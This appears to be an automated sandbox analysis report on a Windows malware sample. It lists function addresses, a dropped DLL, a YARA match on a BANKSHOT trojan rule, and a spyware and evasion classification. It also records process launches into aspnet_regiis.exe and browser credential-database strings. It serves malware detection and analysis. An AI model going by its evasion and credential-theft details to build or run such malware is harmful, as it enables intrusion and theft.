Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_02A2D561	3_2_02A2D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA635A0	3_2_6CA635A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC34A0	3_2_6CAC34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACC4A0	3_2_6CACC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA76C80	3_2_6CA76C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6D4E0	3_2_6CA6D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA6CF0	3_2_6CAA6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA764C0	3_2_6CA764C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8D4D0	3_2_6CA8D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD542B	3_2_6CAD542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CADAC00	3_2_6CADAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA5C10	3_2_6CAA5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB2C10	3_2_6CAB2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA75440	3_2_6CA75440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD545C	3_2_6CAD545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC85F0	3_2_6CAC85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA0DD0	3_2_6CAA0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7FD00	3_2_6CA7FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8ED10	3_2_6CA8ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA90512	3_2_6CA90512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC4EA0	3_2_6CAC4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CACE680	3_2_6CACE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA85E90	3_2_6CA85E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD76E3	3_2_6CAD76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6BEF0	3_2_6CA6BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7FEF0	3_2_6CA7FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC9E30	3_2_6CAC9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB5600	3_2_6CAB5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA7E10	3_2_6CAA7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD6E63	3_2_6CAD6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6C670	3_2_6CA6C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB2E4E	3_2_6CAB2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA84640	3_2_6CA84640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA89E50	3_2_6CA89E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA3E50	3_2_6CAA3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB77A0	3_2_6CAB77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6DFE0	3_2_6CA6DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA96FF0	3_2_6CA96FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA79F00	3_2_6CA79F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA7710	3_2_6CAA7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA960A0	3_2_6CA960A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8C0E0	3_2_6CA8C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA58E0	3_2_6CAA58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD50C7	3_2_6CAD50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAB820	3_2_6CAAB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAB4820	3_2_6CAB4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA77810	3_2_6CA77810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAF070	3_2_6CAAF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA88850	3_2_6CA88850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8D850	3_2_6CA8D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6C9A0	3_2_6CA6C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA9D9B0	3_2_6CA9D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA5190	3_2_6CAA5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAC2990	3_2_6CAC2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7D960	3_2_6CA7D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CABB970	3_2_6CABB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CADB170	3_2_6CADB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA8A940	3_2_6CA8A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA622A0	3_2_6CA622A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA94AA0	3_2_6CA94AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7CAB0	3_2_6CA7CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD2AB0	3_2_6CAD2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CADBA90	3_2_6CADBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA81AF0	3_2_6CA81AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAE2F0	3_2_6CAAE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA8AC0	3_2_6CAA8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAA9A60	3_2_6CAA9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA6F380	3_2_6CA6F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAD53C8	3_2_6CAD53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CAAD320	3_2_6CAAD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA7C370	3_2_6CA7C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CA65340	3_2_6CA65340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB6ECD0	3_2_6CB6ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB0ECC0	3_2_6CB0ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBEAC30	3_2_6CBEAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBD6C00	3_2_6CBD6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB1AC60	3_2_6CB1AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB14DB0	3_2_6CB14DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC9CDC0	3_2_6CC9CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBA6D90	3_2_6CBA6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC3AD50	3_2_6CC3AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBDED70	3_2_6CBDED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC98D20	3_2_6CC98D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB96E90	3_2_6CB96E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB1AEC0	3_2_6CB1AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBB0EC0	3_2_6CBB0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBF0E20	3_2_6CBF0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBAEE70	3_2_6CBAEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB1EFB0	3_2_6CB1EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CBEEFF0	3_2_6CBEEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CB10FE0	3_2_6CB10FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_6CC58FB0	3_2_6CC58FB0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6D5CDB80 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6CAA94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02A047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6CA9CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02A10609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 02A104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6CC909D0 appears 37 times

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1421898994.000000000114E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.1407332677.0000000000C44000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe

Static PE information: Section: JO_E58 ZLIB complexity 1.0003312317251463

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/26@1/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_6CAC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6CAC7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_02A114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_02A11807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,RtlAllocateHeap,wsprintfA,VariantClear,

3_2_02A11807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000003.00000003.1834985106.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DCD000.00000004.00000020.00020000.00000000.sdmp, JJKFBA.3.dr, CBKJEG.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wininet.dll	Jump to behavior
